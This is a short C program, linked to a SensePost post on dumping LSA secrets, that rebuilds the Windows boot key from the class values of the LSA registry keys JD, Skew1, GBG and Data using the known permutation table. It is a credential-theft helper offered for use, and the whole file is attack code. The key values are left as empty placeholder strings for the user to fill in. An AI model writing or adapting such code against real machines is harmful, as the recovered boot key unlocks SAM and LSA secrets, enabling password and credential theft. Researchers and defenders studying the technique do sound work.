C Code to extract boot key by printing out LSA hives (https://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/)

extract_boot_key.c

#include <windows.h>
#include <stdio.h>
#define BOOT_KEY_SIZE 16
#pragma warning(disable: 4996)

void hexStringToByteArray(const char* hexString, BYTE* byteArray) {
    size_t len = strlen(hexString);
    for (size_t i = 0; i < len / 2; ++i) {
        sscanf(hexString + 2 * i, "%2hhx", &byteArray[i]);
    }
}

void printByteArray(const BYTE* byteArray, size_t length) {
    for (size_t i = 0; i < length; ++i) {
        printf("%02x", byteArray[i]);
    }
    printf("\n");
}

void permuteBootKey(BYTE* bootKey) {
    BYTE temp[BOOT_KEY_SIZE];
    memcpy(temp, bootKey, BOOT_KEY_SIZE);

    int transforms[] = { 8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7 };
    for (int i = 0; i < BOOT_KEY_SIZE; ++i) {
        bootKey[i] = temp[transforms[i]];
    }
}

int main() {
    char classValue_GBG[256];
    char classValue_Data[256];
    char classValue_JD[256];
    char classValue_Skew1[256];
    BYTE bootKey[BOOT_KEY_SIZE];
    size_t offset = 0;
    strcpy(classValue_GBG, "");
    strcpy(classValue_Data, "");
    strcpy(classValue_JD, "");
    strcpy(classValue_Skew1, "");
    hexStringToByteArray(classValue_JD, bootKey + offset);
    offset += strlen(classValue_JD) / 2;
    
    hexStringToByteArray(classValue_Skew1, bootKey + offset);
    offset += strlen(classValue_Skew1) / 2;

    hexStringToByteArray(classValue_GBG, bootKey + offset);
    offset += strlen(classValue_GBG) / 2;
    hexStringToByteArray(classValue_Data, bootKey + offset);
    offset += strlen(classValue_Data) / 2;

    permuteBootKey(bootKey);
    printf("Boot key is: ");
    printByteArray(bootKey, BOOT_KEY_SIZE);
    return 0;
}